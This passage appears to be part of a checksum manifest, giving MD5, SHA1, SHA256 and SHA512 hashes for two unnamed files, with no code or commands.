  SHA1: 8119030034e6fbe62d875e824b5233c1f29d61a0
  SHA256: 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
  SHA512: 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
- MD5: 5768a809b9fcbff117dffa8cbf2e8852
  SHA1: a056e76d15bc7509d0361175b2ae4ba348460cd6
  SHA256: 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
  SHA512: 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b